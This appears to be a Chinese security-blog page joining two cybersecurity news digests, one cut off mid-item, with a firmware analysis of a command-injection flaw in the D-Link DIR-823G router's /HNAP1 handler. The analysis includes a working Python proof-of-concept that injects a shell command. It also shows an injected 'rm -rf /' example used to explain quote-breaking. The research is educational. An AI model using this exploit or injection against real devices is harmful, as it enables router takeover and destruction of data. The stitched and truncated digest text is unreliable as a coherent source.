美国西部联盟银行（WAB）披露了一起影响其客户个人信息的数据泄露事件，该事件发生于2024年10月12日至2024年10月24日之间。调查显示，此次泄露源于第三方供应商安全文件传输软件中的一个漏洞。西部联盟银行和许多其他组织都使用了该软件。未经授权的攻击者利用了这个以前未知的漏洞，获得了对西部联盟银行部分系统的访问权限，并获取了存储在这些系统中的文件副本。西部联盟银行于2025年1月27日发现了未经授权的访问。经过广泛审查，该银行于2025年2月21日确定，泄露的文件中包 4、攻击者声称出售1200万法国人的数据信息 https://www.presse-citron.net/alerte-generale-les-donnees-de-12-millions-de-francais-fuitent-en-ligne/ 一个昵称为“Angel_Batista”的网络犯罪分子在黑客论坛上声称出售1200万法国人的个人信息，涉及姓名、家庭住址、联系方式等各类详细信息。攻击者称这些数据是在上个月窃取的，但他没有说明具体的窃取途径，并且该攻击者发布了一份10万人的数据样本，以证明其真实性。攻击者以一万美元的价格出售这些数据，并且只接受买家通过XMR加密货币进行付款。目前这些数据的真实性及有效性尚未经过验证。 5、思科IOS XR漏洞导致路由器BGP进程崩溃 https://www.freebuf.com/vuls/424708.html 思科近日修复了一个拒绝服务（DoS）漏洞，该漏洞编号为CVE-2025-20115，可能导致未经身份验证的远程攻击者通过发送单一BGP更新消息，使IOS XR路由器中的边界网关协议（BGP）进程崩溃。 6、勒索软件攻击创历史新高：2025年2月攻击量激增126% https://hackread.com/ransomware-attacks-hit-record-high-in-february-2025/ Bitdefender的报告显示，2025年2月是勒索软件攻击历史上最严重的一个月，宣称的受害者数量较去年同期激增126%。 7、近百万台企业和个人电脑遭恶意软件入侵 https://www.csoonline.com/article/3845100/fast-1-million-geschafts-und-privat-pcs-kompromittiert.html 微软在最近的一份报告中得出了这些结论。2024年12月初发现的大规模数据窃取活动展示了此类感染的广泛程度及其潜在后果。犯罪分子利用GitHub、Discord和Dropbox将恶意软件传播到近百万台设备上。 8、恶意PyPI包窃取云令牌，移除前下载量超1.4万次 https://www.freebuf.com/articles/database/424701.html 网络安全研究人员近日警告，Python包索引（PyPI）仓库用户正成为恶意攻击的目标。攻击者通过伪装成与“时间”相关的工具包，实则隐藏了窃取敏感数据（如云访问令牌）的功能。软件供应链安全公司ReversingLabs表示，他们发现了两组共计20个恶意包，累计下载量超过1.41万次。 9、腾达 AC7 路由器漏洞：攻击者可获取 Root Shell 权限 https://www.anquanke.com/post/id/305052 运行固件版本 V15.03.06.44 的腾达 AC7 路由器存在一个严重漏洞，恶意行为者可利用该漏洞执行任意代码并获取根 shell 访问权限。该漏洞源于路由器 formSetFirewallCfg 函数中的栈溢出漏洞。攻击者可通过精心构造的 HTTP 请求完全攻陷受影响的设备。 10、AI 成为网络犯罪分子高速执行攻击的强大工具 https://www.anquanke.com/post/id/305071 人工智能已成为网络犯罪分子武器库中一种强大的武器，使他们能够以前所未有的精准度、速度和规模发动攻击。安全专家警告称，网络犯罪分子越来越多地利用自动化人工智能系统渗透网络、窃取数据，并以人工操作无法企及的速度部署智能病毒。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 D-Link DIR-823G v1.02 B05存在命令注入漏洞，攻击者可以通过POST的方式往 /HNAP1发送精心构造的请求，执行任意的操作系统命令。 漏洞分析 binwalk提取固件，成功获取到固件。 现在我们已经进入到应用里了，那么我们在进行分析固件的时候，应该怎么去分析这个情况？首先，我们去分析别人的漏洞，别人是会告诉哪里会出现问题。但是我们现在假设我们是分析一个未知固件，我们就得先知道这个固件有哪些应用，启动了哪些服务，最清晰和简便的方式就是去看我们etc文件下面，里面有个叫init.d的目录，里面是关于启动项的内容。 我们首先来看rcS下面的内容 vim rcS 首先是设置ip，然后挂载了两个文件系统分别是proc，这是与进程相关的文件系统，包括当前进程启动存放在哪个地址。 还有ramfs文件系统，根据以前的笔记，可知ramfs文件系统跟RAM相关。 然后下面就是判断是否还有挂载别的文件系统。 然后mkdir就是创建各种各样的文件夹，都有对应的功能，比如说创建了pptp文件夹，针对拨号上网的功能，然后还有smbd服务，可以看到创建了一个usb的文件夹，说明该固件有可以跟usb也就是U盘相关的操作，接下来都是一些配置信息。 继续往下翻 可以看到该固件启动了web server的web服务，也就是httpd的内容，这里启动的是goahead，通过这个名字，我们可以确定web服务就是goahead，如果想要分析web服务的话，就直接分析goahead就可以。 我们回到squashfs-root目录下，搜索goahead的一些简单情况 grep -ir "goahead" . 最下面是两个启动项的内容，可以忽略，然后第一行是bin的可执行应用，这个其实就是我们最后分析的内容。 那如何分析呢？它是一个HNAP1请求，那就可以去检索我们的HANP1请求 grep -ir "HNAP1" . 可以看到它检索到一些js代码，js代码对我们来说一般，(比较我们是找二进制相关的漏洞) 但是，我们可以发现它匹配了一个二进制程序，也就是goahead。 这里我们先科普一下goahead的一些情况： GoAhead ，它是一个源码,免费、功能强大、可以在多个平台运行的嵌入式WebServer。 goahead的websUrlHandlerDefine函数允许用户自定义不同url的处理函数。 它在进行编写与它相关的请求，是通过websUrlHandlerDefine来确定的。 websUrlHandlerDefine(T("/HNAP1")，NULL,0, websHNAPHandler,0); websUrlHandlerDefine(T("/goform")，NULL,0, websFormHandler,0); websUrlHandlerDefine(T("/cgi.bin")，NULL,0, websCgiHandler,0); 使用ghidra进行逆向分析，goahead二进制文件在squashfs-root目录下的bin目录下 那进入到goahead反编译界面该如何分析呢？一种是找到main函数去进行分析，比较耗时 一种是通过关键字来搜索，反推调用情况，来推测每个功能的解析情况 ctrl+shift+E 匹配成功，停在指定区域 但是它所对应的反编译代码还是很多的，所以我们可以通过反编译出来的函数名，进行查看它的调用关系。 一路往下翻，终于找到我们所要的东西 而且我们看到，这个函数继续往上调的话就是main函数了，所以其实一开始也是可以从main函数来分析的(0.0) 所以现在我们可以重点来分析这个函数 前面还是做一些判断，然后请求还有不止HNAP1，对应的都是一个函数。 同一个函数做的事情，类似于websUrlHandlerDefine这个函数，那HANP1对应的函数是 FUN_0042383c，那就双击进去看看 这里就是漏洞点，这里执行了memset和snprintf，一般来说这里应该是不存在漏洞点，但是下面一条语句是system，也就是把格式化化的字符串直接就拿到了system函数作为参数传递进去，而snprintf这里的参数有个echo，有个单引号问题。 比如说正常代码 #!/bin/bash read -p "Enter your name: " name echo 'Hello, '$name'!' 攻击步骤： 正常输入：用户输入 Alice，输出： Hello, Alice! 恶意输入：用户输入 '$(id)'，此时脚本实际执行的命令变为： echo 'Hello, ''$(id)'!' 输出： Hello, $(id)! 单引号内的 $(id) 不会被执行，暂时安全。 更危险的输入：用户输入 ' && rm -rf / #，命令变为： echo 'Hello, '' && rm -rf / #'! 此时，第一个单引号被用户输入的 ' 闭合。&& rm -rf / 成为独立命令，在 echo 之后执行。# 注释掉后续的 '!，避免语法错误。 那么会导致rm -rf / 会被执行，删除系统文件！ 所以，如果我们构造一些恶意的代码写入到snprintf中，再传递到system函数，就会造成命令注入漏洞。 但是我们要进到漏洞点的话，还需要满足函数上面的一些要求。 所以我们得符合上面函数的一些限制才能进入到漏洞点来，这里先取了PTR_s_SetMultipleActions_00588d80的首地址，赋值给DAT_0058a6c4，然后DAT_0058a6c4自身判断和自加2来进行循环判断，用strstr函数查找DAT_0058a6c4在param_+0x524中出现的位置，并赋值给pcVar1，如果pcVar1的值不为0的话，就会进入到我们的漏洞点来。 DAT_0058a6c4与PTR_s_SetMultipleActions_00588d80相关，双击进去看看 可以看到里面都是它对应的一些方法，比如说SetMultipleActions之类的。 固件模拟 分析到这里，基本上是明朗了，接下来就要进行固件模拟操作，使用firmadyne模拟固件启动。 sudo ./DIR823G_V1.0.2B05_20181207.sh 然后firmadyne默认的密码就是firmadyne 得等一段时间，然后192.168.0.1 但是这个一直搞不定，模拟不起来，也不知道是什么原因，排查不出。 然后换成了firmware analysis plus (fap)这个框架，就模拟起来了 等一段时间后，回车，就可以模拟起来了，输入192.168.0.1 进入向导，随便输入点东西 密码8位，输入12345678 然后就开始配置一些内容，同时可以注意到左侧已经把一些数据写入到关键的文件夹中 配置完毕，登录，成功进入路由器 exp编写 #!/usr/bin/env python #-*- coding:utf-8 -*- import requests ip='192.168.0.1' command="'`echo aaaaaaaaa > /web_mtn/test.txt`'" length=len(command) headers=requests.utils.default_headers() headers["Content-Length"]=str(length) headers["User-Agent"]="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36" headers["SOAPAction"]='"http://purenetworks.com/HNAP1/GetClientInfo"' headers["Content-Type"]="text/xml; charset=UTF-8" headers["Accept"]="*/*" headers["Accept-Encoding"]="gzip, deflate" headers["Accept-Language"]="zh-CN,zh;q=0.9,en;q=0.8" payload=command r=requests.post('http://'+ip+'/HNAP1/', headers=headers, data=payload) 因为是http请求，所以我们使用requests，然后设置ip，设置命令，构造报头，最后post请求将HNAP1，headers和payload都传过去。 复现完毕，ctrl+a 然后x结束固件模拟。

1、研究人员发现新型勒索软件SuperBlack https://www.forescout.com/blog/new-ransomware-operator-exploits-fortinet-vulnerability-duo/ 研究人员在一月底至三月初之间发现了一系列基于两个Fortinet漏洞的入侵事件。这些事件始于对Fortigate防火墙设备的恶意利用，这两个漏洞均为身份验证绕过漏洞，分别是CVE-2024-55591和CVE-2025-24472，并最终部署了一种被命名为“SuperBlack”的新型勒索软件。研究人员将这些入侵事件归因于其命名为“Mora_001”的攻击组织，该组织使用高度结构化的攻击链，并且在不同受害者之间 2、ESHYFT健康科技公司因配置错误暴露医护人员信息 https://cybersecuritynews.com/86000-healthcare-staff-records-exposed/ 研究人员发现一起涉及医护人员信息的数据泄露事件，该事件暴露了ESHYFT健康科技公司的86000多条记录。研究人员发现了一个不受保护的AWS S3存储桶，其中包含约108.8GB数据，这些数据缺乏密码保护或加密，导致私人医护人员信息可以被公开访问。这个配置错误的云存储中包含高度敏感的个人身份信息（PII），包括个人资料图片、工作日程、专业证书和可能受HIPAA法规保护的医疗文件。该公司发布了一份简短声明，确认收到了通知并表示正在调查此次事件。 3、研究人员披露名为OBSCURE#BAT的攻击活动 https://www.securonix.com/blog/analyzing-obscurebat-threat-actors-lure-victims-into-executing-malicious-batch-scripts-to-deploy-stealthy-rootkits/ 研究人员发现一个名为“OBSCURE#BAT”的隐秘的恶意软件攻击活动，该活动利用社会工程学和具有欺骗性的文件诱骗用户执行高度混淆的批处理脚本，最终会植入一个用户模式的rootkit，该rootkit会操纵系统进程和注册表项，能够隐藏或屏蔽任何以特定前缀开头的文件、注册表项或任务，以规避检测并保持持久性 4、攻击者通过YouTube平台传播DCRat恶意软件 https://securelist.com/new-wave-of-attacks-with-dcrat-backdoor-distributed-by-maas/115850/ 自今年年初以来，研究人员追踪到新一轮的DCRat传播活动。攻击者通过YouTube平台传播DCRat恶意软件，攻击者创建虚假账号或使用窃取的账号，上传宣传作弊器、破解软件、游戏机器人或其他类似软件的视频。在视频描述中含有下载链接，该链接指向一个合法的共享文件服务，其中包含一个受密码保护的压缩包文件，解压密码存在于视频描述中，而压缩包文件中的程序将会在受害者电脑中植入DCRat恶意软件。 5、思科修复IOS XR中的一个拒绝服务漏洞 https://www.bleepingcomputer.com/news/security/cisco-vulnerability-lets-attackers-crash-bgp-on-ios-xr-routers/ 思科修复了一个拒绝服务（DoS）漏洞，该漏洞允许攻击者通过一条BGP更新消息使IOS XR路由器上的边界网关协议（BGP）进程崩溃。该漏洞被标识为CVE-2025-20115，成功利用该漏洞允许未经身份验证的攻击者通过缓冲区溢出导致内存损坏，从而导致BGP进程重启，在低复杂度的攻击中远程关闭易受攻击的设备。 6、攻击者针对Jupyter Notebooks环境进行攻击 https://www.aquasec.com/blog/stopping-sobolan-with-aqua-runtime-protection/ 研究人员发现了一个新的恶意软件活动，该活动专门针对Jupyter Notebooks等交互式计算环境，对云原生基础设施构成了重大威胁。攻击者通过未经身份验证的JupyterLab实例获得初始访问权限，然后下载包含恶意二进制文件和shell脚本的压缩包文件。一旦执行，这些脚本就会启动一系列用于劫持系统资源进行加密货币挖矿、建立持久性并规避检测的进程。 7、多个僵尸网络利用Edimax物联网设备漏洞进行攻击活动 https://www.akamai.com/blog/security-research/march-edimax-cameras-command-injection-mirai 研究人员在蜜罐网络中发现了针对URI /camera-cgi/admin/param.cgi的攻击活动。经过进一步调查，研究人员将此活动归因于针对Edimax IoT设备的漏洞利用尝试。在分析固件后，研究人员确定这些漏洞是影响Edimax IoT设备的命令注入漏洞，该漏洞被标识为CVE-2025-1316。研究人员于2024年10月首次在蜜罐中发现攻击活动，并已发现多个僵尸网络利用此漏洞，包括Mirai变种。 8、研究人员披露一起针对PyPI存储库的攻击活动 https://thehackernews.com/2025/03/malicious-pypi-packages-stole-cloud.html 研究人员披露一起针对Python包索引（PyPI）存储库的攻击活动，攻击者使用伪装的虚假库，最终窃取云访问令牌等敏感数据。研究人员发现了两组总计20个恶意软件包，这些软件包累计下载量超过14100次。目前这些所有已识别的恶意软件包均已从PyPI中删除。 9、ruby-saml库中存在两个身份验证绕过漏洞 https://cybersecuritynews.com/ruby-saml-vulnerabilities-bypass-authentication/ 研究人员在ruby-saml库中发现了两个严重的身份验证绕过漏洞，可能使大量Web应用程序遭受帐户接管攻击。这两个漏洞是CVE-2025-25291和CVE-2025-25292，这些漏洞源于ruby-saml在SAML响应签名验证过程中使用了两个不同的XML解析器，这种双解析器方法具有安全缺陷，允许攻击者操纵验证检查。使用ruby-saml库的组织应立即更新到1.18.0版本，以修复漏洞。 10、攻击者声称窃取本田汽车印度客户的数据信息 https://cybersecuritynews.com/hackers-allegedly-selling-honda-cars-data/ 一个昵称为“Empire”的攻击者在网络犯罪论坛上声称出售包含本田汽车印度有限公司3176958条记录的数据库。据称，泄露的数据包括敏感的客户信息，例如姓名、别名、地址、客户ID以及移动电话号码和电子邮件地址等联系方式。本田汽车印度公司尚未就此次事件发表官方声明。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。